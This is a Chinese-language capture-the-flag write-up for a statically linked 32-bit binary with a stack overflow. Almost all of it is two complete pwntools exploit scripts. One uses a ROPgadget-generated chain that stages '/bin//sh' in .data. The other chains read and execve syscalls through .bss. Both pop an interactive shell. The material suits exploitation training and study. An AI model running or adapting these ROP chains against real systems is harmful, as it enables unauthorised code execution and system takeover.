保护
ida
静态链接(原文“本地链接”),栈溢出,返回地址偏移为 0xc+4,没有 system,考虑直接用 execve 系统调用
ROPgadget 发现可以控制系统调用所需的四个寄存器 (eax/ebx/ecx/edx),但二进制里没有 /bin/sh 字符串,需要先把它写进可写段 (.data 或 .bss)
exp
法1,用 ROPgadget --ropchain 自动生成:先把 "/bin//sh\0" 逐 4 字节写到 .data,再 execve
from pwn import*
from struct import pack
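# Gadget and data addresses as reported by `ROPgadget --binary rop --ropchain`.
# They are absolute, so this only works because the binary is not PIE.
POP_EDX = 0x0806ecda      # pop edx ; ret
POP_EAX = 0x080b8016      # pop eax ; ret
POP_EBX = 0x080481c9      # pop ebx ; ret
POP_ECX = 0x080de769      # pop ecx ; ret
MOV_EDX_EAX = 0x0805466b  # mov dword ptr [edx], eax ; ret
XOR_EAX = 0x080492d3      # xor eax, eax ; ret
INC_EAX = 0x0807a66f      # inc eax ; ret
INT80 = 0x0806c943        # int 0x80 (no ret; fine as the last gadget of the chain)
DATA = 0x080ea060         # writable .data, used to stage "/bin//sh\0"

SYS_EXECVE = 0xb          # i386 syscall number of execve
PADDING = 0xc + 4         # buffer + saved ebp, i.e. distance to the saved return address
TARGET = "/home/error/桌面/rop"


def _p(value):
    """Pack one 32-bit little-endian word (the target is i386)."""
    return pack('<I', value)


def _store(addr, dword):
    """Chain fragment: write the raw 4-byte *dword* to *addr* via `mov [edx], eax`."""
    return _p(POP_EDX) + _p(addr) + _p(POP_EAX) + dword + _p(MOV_EDX_EAX)


def _store_zero(addr):
    """Chain fragment: write a NUL dword to *addr*.

    Uses `xor eax, eax` instead of `pop eax; 0` so the chain itself stays free
    of NUL bytes (ROPgadget generates it that way; presumably to survive a
    string-copy style overflow).
    """
    return _p(POP_EDX) + _p(addr) + _p(XOR_EAX) + _p(MOV_EDX_EAX)


def build_chain(data=DATA, padding=PADDING):
    """Return the overflow payload: padding followed by a ROP chain that runs
    execve("/bin//sh", argv, envp) through `int 0x80`.

    Memory staged in .data:  data+0 = "/bin", data+4 = "//sh", data+8 = 0.
    Register setup:          ebx = data (path), ecx = data+8 (argv -> {NULL}),
                             edx = data+8 (envp -> {NULL}), eax = SYS_EXECVE.
    eax is counted up with `inc eax` rather than popped, again to keep the
    chain NUL-free.

    Args:
        data: address of a writable, fixed-address region (default: .data).
        padding: bytes to reach the saved return address.
    """
    chain = b'a' * padding
    chain += _store(data, b'/bin')
    chain += _store(data + 4, b'//sh')
    chain += _store_zero(data + 8)
    chain += _p(POP_EBX) + _p(data)
    chain += _p(POP_ECX) + _p(data + 8)
    chain += _p(POP_EDX) + _p(data + 8)
    chain += _p(XOR_EAX) + _p(INC_EAX) * SYS_EXECVE
    chain += _p(INT80)
    return chain


def main(target=TARGET):
    """Spawn *target*, deliver the payload on one line and hand over the shell."""
    io = process(target)
    io.sendline(build_chain())
    io.interactive()


if __name__ == "__main__":
    import sys
    # Optional: path to the binary as the first argument (defaults to TARGET).
    main(sys.argv[1] if len(sys.argv) > 1 else TARGET)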
法2,手动构造:先用 sys_read 把 "/bin/sh\0" 读进 .bss,再 execve;因为要串联两次系统调用,需要带 ret 的 int 0x80 gadget
from pwn import*
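# Gadgets (same binary as above); absolute addresses, so the binary must not be PIE.
POP_EAX = 0x080b8016   # pop eax ; ret
POP_EBX = 0x080481c9   # pop ebx ; ret
POP_ECX = 0x080de769   # pop ecx ; ret
POP_EDX = 0x0806ecda   # pop edx ; ret
# `int 0x80 ; ret`, found with radare2 -- ROPgadget only reports a bare `int 0x80`.
# The trailing ret is essential here: two syscalls are chained, so control must
# come back to the stack after the first one.
INT80_RET = 0x0806f430
BSS = 0x080EB5BD       # writable .bss scratch into which "/bin/sh\0" is read
SYS_READ = 0x3
SYS_EXECVE = 0xb
SHELL = b"/bin/sh\x00"
READ_LEN = 0x10        # must cover len(SHELL) plus the newline sendline() appends
PADDING = 0xc + 4      # buffer + saved ebp, i.e. distance to the saved return address
TARGET = "/home/error/桌面/rop"


def _p(value):
    """Pack one 32-bit little-endian word.

    Done with int.to_bytes rather than pwntools' flat() so the word size does
    not silently depend on context.bits.
    """
    return value.to_bytes(4, 'little')


def _syscall(nr, ebx, ecx, edx):
    """Chain fragment: load eax/ebx/ecx/edx and issue `int 0x80 ; ret`."""
    return (_p(POP_EAX) + _p(nr) + _p(POP_EBX) + _p(ebx)
            + _p(POP_ECX) + _p(ecx) + _p(POP_EDX) + _p(edx) + _p(INT80_RET))


def build_chain(bss=BSS, padding=PADDING):
    """Return the overflow payload: read(0, bss, READ_LEN) then execve(bss, 0, 0).

    The binary contains no "/bin/sh", so the first syscall reads it from stdin
    into .bss; main() sends it as the second line. argv and envp are passed as
    NULL. NOTE(review): the original exploit relies on the kernel accepting a
    NULL argv for execve; a pointer to {bss, 0} would be the more portable form.

    Args:
        bss: writable, fixed-address scratch buffer for the shell path.
        padding: bytes to reach the saved return address.
    """
    chain = b'A' * padding
    chain += _syscall(SYS_READ, 0, bss, READ_LEN)
    chain += _syscall(SYS_EXECVE, bss, 0, 0)
    return chain


def main(target=TARGET):
    """Spawn *target*, send the chain, then feed the shell path to the staged read()."""
    context.log_level = "debug"   # set before spawning so the launch is logged too
    io = process(target)
    io.sendline(build_chain())
    # Consumed by read(0, BSS, READ_LEN) inside the chain.
    # NOTE(review): both lines go out back-to-back, which only works if the
    # vulnerable input routine stops at the newline; a single large read()
    # would swallow "/bin/sh" as well and leave the staged read blocking.
    io.sendline(SHELL)
    io.interactive()


if __name__ == "__main__":
    import sys
    # Optional: path to the binary as the first argument (defaults to TARGET).
    main(sys.argv[1] if len(sys.argv) > 1 else TARGET)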